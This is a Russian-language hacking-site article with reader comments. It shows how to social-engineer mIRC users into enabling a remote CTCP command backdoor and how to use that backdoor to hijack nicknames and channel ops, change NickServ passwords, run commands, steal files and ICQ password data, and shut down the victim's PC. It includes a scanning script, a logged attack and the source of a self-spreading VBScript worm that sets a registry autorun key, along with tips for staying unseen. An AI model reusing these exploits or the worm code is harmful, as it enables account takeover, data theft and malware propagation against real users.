Уязвимость мирк скриптов и как её юзать — HackZona.Ru

Уязвимость мирк скриптов и как её юзать

Уязвимость мирк скриптов и как её юзать

Тип статьи:
Со старой ХакЗоны.
Такмс… Для начала надо расказать о самой уязвимости =))
Нет лёгких методов взлома, но взлом irc будет достаточно прост если вам удастся выполнить миссию и заставить пользователя набрать нужную вам команду.
Команда: //write St1m.log ctcp 1:*:?:$1- | Load -rs St1m.log

Что делает ета простая команда?!
Всё очень легко =))
//write St1m.log ctcp 1:*:?:$1- = записывает в корень irc файл под названием St1m.log в котором содержится ctcp 1:*:?:$1-
Собсно рассомтрим ctcp 1:*:?:$1- слово ctcp говорит о том что ето маска на ctcp команды цифра 1 означает что пользователь с уровнем 1 (тоесть все =)) может посылать вам ctcp запросы. Далее идём маска :*:?: которая разрешает все запросы и в самом конце идентификатор $1- который возвращает все ващи команды.
Так что вам надо всеголишь заставить пользователя ввести данную строку в своём мирке после чего он создаст для себя уязвимость.
Вот некоторые команды:
Сделать чтоб юзер зашёл на канал: /ctcp NICK /j #CHANNEL
Юзер покидает канал: /ctcp NICK /part #CHANNEL
Послать сообщение от имени жертвы: /ctcp NICK /msg #CHANNEL OUR MESSAGE...
Послать приватное сообщение от имени жертвы: /ctcp NICK /msg NICK(anyone) OUR MESSAGE...
Закрыть mirc жертвы: /ctcp NICK /exit
Сменить жертве пароль: /ctcp NICK /msg nickserv set passwd NEW_PASS
Сменить жертве ник: /ctcp NICK /nick NeW_NicK
Если жертва является опом то следующей командой вы заставляете её дать вам опа на канале: /ctcp NICK /mode #channel +o OUR_NICK
Выполнить на компьютере жертвы команду MS-DOS: /ctcp NICK /run command
Открыть mirc на компьютере жертвы: /ctcp NICK /run mirc
Запустить редактор реестра на компе жертвы: /ctcp NICK /run regedit
Флуд на компе жертвы: /ctcp NICK /timer1 0 0 /ping $me
Вырубить винду на компе жертвы: /ctcp NICK /run exitwindows

такмс...
Уже нетерпиться попробовать ето все на практике, но какже посмотреть на мирк сервере есть ли уже люди которые ввели ету строчку???

Скрипт скана мирк серверов

#SCAN
alias mass {
set %i 1
var %massmsgmsg Yes
set %nickme $me
:next
set %nick $nick(#,%i)
if (%nick == $null) goto done
if (%nick != $me) { /ctcp %nick /msg %nickme %massmsgmsg }
inc %i
goto next
:done
}

Я думаю тут все понятно и без обьяснений =))
Так… теперь мы можем найти пользователя на канале с уязвимостью и сможем пошутить над ним, но какже быть с более серьёзными атаками
Минус в том что ети команды не обрабатывают идентификаторы, но зачемже тогда команда /write =)))
так вот пример атаки и сбора сведений о компьютере жертвы
___________________________________________________________________________
— > Узнаю в какой директории лежит Мирк .exe
[06:59:12] -> [[SF]Norfolk] /WRITE fool.txt /notice Кевин_Митник $mircdir
[06:59:56] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[06:59:58] -[SF]Norfolk- D: Мирка
— > Узнаю на каком диске находится WINDOWS
[07:02:21] -> [[SF]Norfolk] /WRITE fool.vbs set FSO = createobject(«scripting.filesystemObject»)
[07:02:33] -> [[SF]Norfolk] /WRITE fool.vbs set dirwin = fso.getspecialfolder(0)
[07:02:46] -> [[SF]Norfolk] /WRITE fool.vbs set text = fso.createtextfile(«fool.txt»)
[07:02:59] -> [[SF]Norfolk] /WRITE fool.vbs text.writeline "/notice Кевин_Митник" & " " & dirwin
[07:03:09] -> [[SF]Norfolk] /WRITE fool.vbs text.close
[07:03:36] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[07:03:38] -[SF]Norfolk- C:WINDOWS
— > Очищаю документы
[07:05:36] -> [[SF]Norfolk] /WRITE -c fool.txt
[07:05:39] -> [[SF]Norfolk] /WRITE -c fool.vbs
____________________________________________________________________________

Как вы уже поняли можно записывать файлы на компьютер жертвы и потом проигрывать их для определённого канала.

ВНИМАНИЕ: Жертва видит что отсылает вам нотисы, так что советую использовать ето когда мирк жертвы свёрнут в трей или жертвы нет у компьютера. И не забывайте чистить файлы а лучше удалять их с компьютера жертвы.
Лучше всего выключать компьютер жертве командой /ctcp NICK /RUN shutdown.exe -s -f -t 00

Вот некоторые идентификаторы которые помогут тебе собрать нужную информацию

OS — $os
Host — $host
email — $emailaddr
Название лога который лежит в папке под номером 100 — $findfile($mircdirlogs,*.*,100)
$disk(C:) — C: если диск существует то вам веррнется $true
$disk(D:) — D:
$disk(E:) — E:
mirc folder — $mircdir


Следующий пример неработает в некоторых irc серверах

Вы должны заставить жертву набрать следующее:
/fserve OUR_NICK 4 c:

После этого диск C: компьютера жертвы будет открыт для вас. И вы сможете делать следующее:

Команды:

cd: С помощью этой команды вы можете перейти в любую папку.
Например: cd windows (попадёте в папку windows)

dir: Команда как в MS-DOS

get: Важная команда! Вы можете получить любые файлы с компьютера жертвы. Жертва видит передачу файлов, но если получать маленькие по обьёму файлы то передача будет очень быстрой и жертва может просто не заметить этого.

read: Чтение текстовых файлов.

Вы можете получить пароль от ICQ жертвы. Используя команду get получаете файл .dat и можете получить пароль от ICQ.

Дальше больше.
Попробуем написать вирус который будет рассылать себя по мирку и заражать траянчегом их

set FSO = createobject(«scripting.filesystemObject»)
set scriptini = fso.CreateTextFile(«C:Program Filesscript.ini»)
set virus = FSO.getfile(wscript.scriptfullname)
Set S = CreateObject(«Wscript.Shell»)
mircfile = ""&«St1m.jpg .vbs»
virus.copy(dirsystem&mircfile)
mircoff = dirsystem&mircfile
S.regwrite «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesKernel32», mircoff
scriptini.WriteLine "[script]"
scriptini.WriteLine «n0= on 1:JOIN:#:{»
scriptini.WriteLine «n1= if ( $nick == $me ) { halt }»
scriptini.WriteLine «n2= /dcc send $nick» &" "&mircoff
scriptini.WriteLine «n3= on 1:JOIN:#:{ „
scriptini.WriteLine “n4 /write St1m.st ctcp 1:*:?:$1- | Load -rs St1m.st „
scriptini.WriteLine “n5 }»
set f = fso.GetFolder(«C:Program Files»)
set sf = f.SubFolders
for each f1 in sf
set viruss = FSO.getfile(«C:Program Filesscript.ini»)
file1 =""&«script.ini»
viruss.copy(f1&file1)
next

Если мирк находится или будет находиться в Program Files то етот скрипт его обезательно заразит и начнёт сам себя рассылать всем кто присоединяется к каналам на которых сидит жертва. Даже если жертва удалит мирк и переустановит её то после перезагрузки новый мирк опять заразится.
Нравится
Не нравится

3 комментария

19:57
СтаТья Ваще В ПоряДе спс Те))) Скажи пЛИз Свою icq Мне Тока кое Что Не пОняТно
15:30
аффтар ты о чем? какая нах уязвимость?
это вообщето предусмотренная команда а если юзверь лопух то это уже его дело.
И вообще мирк гадость юзаем опенсурс и не паримся
08:35
Интересная статья, я слышал от кого-то это